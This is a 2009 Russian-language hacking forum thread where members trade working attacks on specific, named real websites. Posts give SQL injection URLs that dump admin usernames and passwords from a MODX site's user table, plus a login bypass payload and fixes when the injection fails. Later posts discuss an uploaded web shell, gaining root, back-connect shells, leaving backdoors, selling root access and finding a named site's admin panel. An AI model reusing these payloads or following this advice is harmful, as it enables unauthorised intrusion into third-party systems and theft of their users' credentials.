Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
     
    1 person likes this.
  2. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    уверен ?
    _http://forum.antichat.ru/threadnav50550-3-10.html
     
    #8522 edge911, 20 Aug 2009
    Last edited: 20 Aug 2009
  3. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    К MSysObjects доступа нет, так что только перебором

    Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp
    В E-mail ' or '1'='1#
    в пароль что угодно
     
    1 person likes this.
  4. lucky_guy

    lucky_guy New Member

    Joined:
    17 Aug 2009
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    sql inj

    короче, есть бажный сайт:
    http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
    в нем столько табличек:
    http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+information_schema.tables+limit+86,1/*
    самые интересные это:
    modx_active_users -тридцатая
    modx_manager_users -37
    modx_web_users -66
    из них получаем столбцы:
    username
    password
    но когда я хочу просмотреть эти столбцы вводя например вот это:
    http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_manager_users+limit+1,1/*
    то никакого имени и пароля не получается!
    может я не так что-то делаю, помогите кто может.
     
  5. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    lucky_guy, выводи во 2ое поле...
     
    #8525 RulleR, 20 Aug 2009
    Last edited: 20 Aug 2009
  6. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    т к в таблице modx_manager_users всего одна запись, то поэтому limit+1,1 ничего не выводит.

    c limit+0,1 всё нормально:
    Code:
    http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_manager_users+limit+0,1/*
     
    1 person likes this.
  7. lucky_guy

    lucky_guy New Member

    Joined:
    17 Aug 2009
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    спасибо=)
     
  8. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Залил шелл... Но имею доступ только к той папке, где находится шелл!
    /imgs/ drwxr-xr-x и всё...
    В чём дело? :(
     
    1 person likes this.
  9. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Дело наверное или в твоих руках..или в правах на папки выше.
    /tmp/ доступно?)
     
  10. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    .:[melkiy]:.
    Что значит в чем дело? о_0 Права грамтные, пробуй порутать.
     
  12. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Скажите где мона почитать на тему бэккоект шела и бинд порта из вебшела.
     
  13. monolog

    monolog Banned

    Joined:
    15 Aug 2009
    Messages:
    7
    Likes Received:
    7
    Reputations:
    5
    https://forum.antichat.ru/showthread.php?t=30711
    http://forum.antichat.ru/showpost.php?p=137357&postcount=1
    мб пригодится
     
    1 person likes this.
  14. Insane bboy

    Insane bboy New Member

    Joined:
    11 Jul 2009
    Messages:
    52
    Likes Received:
    3
    Reputations:
    0
    кто поможет найти админку http://cards.intbel.ru/???
    есть у кого нить таблица для поиска админки? ну типа:
    adm/
    admin/
    admin.php
    итд
    желательно побольше
     
  15. Adm1n4eG

    Adm1n4eG Member

    Joined:
    27 Mar 2009
    Messages:
    24
    Likes Received:
    13
    Reputations:
    6
    только эту нашел _http://admin.intbel.ru
     
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Insane bboy
    1. Админки может не быть
    2. Админка может быть на порту.
    3. Админка может быть на субдомене.
    4. Юзай pelmeshko skaner, он ищет диры и файлы. Удачи.
     
  17. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Пасиб.За ссылки.А для чего руткиты? Допустим я рут с помощью эксплоита. И че дальше?
     
  18. monolog

    monolog Banned

    Joined:
    15 Aug 2009
    Messages:
    7
    Likes Received:
    7
    Reputations:
    5
    Дальше? Ну допустим оставляешь бэкдор. Дальше? если ты не знаешь для чего тебе может понадобится рут, то проще будет его продать.
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://space.jpl.nasa.gov/analog.txt

    Что за нах? о_0
    Там в конце документа вообще какие-то GET-запросы о_0... Мол там каждый 2ой пытается шелл залить =\

    //Моно использовать вместо илворма, т.к. там все баги в Джумле о_0
     
    #8539 Tigger, 21 Aug 2009
    Last edited: 21 Aug 2009
    4 people like this.
  20. Insane bboy

    Insane bboy New Member

    Joined:
    11 Jul 2009
    Messages:
    52
    Likes Received:
    3
    Reputations:
    0
    ок, это как раз то что надо:) спс
     
Thread Status:
Not open for further replies.